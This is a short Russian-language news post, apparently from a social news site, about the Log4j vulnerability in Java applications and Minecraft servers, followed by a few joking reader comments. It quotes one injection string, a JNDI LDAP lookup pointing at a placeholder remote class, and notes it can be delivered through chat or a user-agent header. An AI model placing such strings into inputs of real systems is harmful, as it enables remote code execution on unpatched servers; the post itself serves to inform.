Уязвимость в библиотеке Log4j угрожает многим приложениям на Java
Пользовательские серверы Minecraft в панике. Как пишут, достаточно лишь отправить сообщение в чат, чтобы выполнить вредоносный код.
Обычно от логировщика требуется одно: получить строку и отправить в соответствии с предоставленными конфигурациями. Но Log4j проверяет входные данные и резолвит их.
Как пример, на Хакерньюз приводят такое:
Logging from ${java:vm} // на выходе будет Logging from Oracle JVM
Если как аргумент скормить что-то такое:
${jndi:ldap://someremoteclass}
то с удалённого сервера можно подгрузить класс и динамически исполнить вредоносный код.
Как пример уязвимости — http сервер, который логирует строку, скажем, user agent.
Конкретно для Minecraft вышел официальный патч 1.18.1, который закрывает уязвимость, но множество пользовательских серверов всё ещё подвержены этому.
12K12K открытий
22 репоста
Пользовательские серверы Minecraft в панике. Как пишут, достаточно лишь...<ЧИТАТЬ ПРОДОЛЖЕНИЕ В ИСТОЧНИКЕ>
надо было на превью ставить классический крик школьника после удаления дома
Есть кое-что получше.
https://youtu.be/_kME6JH-eaw
Одмин взломал жопу
Комментарий недоступен
Старнно, что заметили только сейчас, выглядит как что-то очевидное
Я заметил ещё вчера )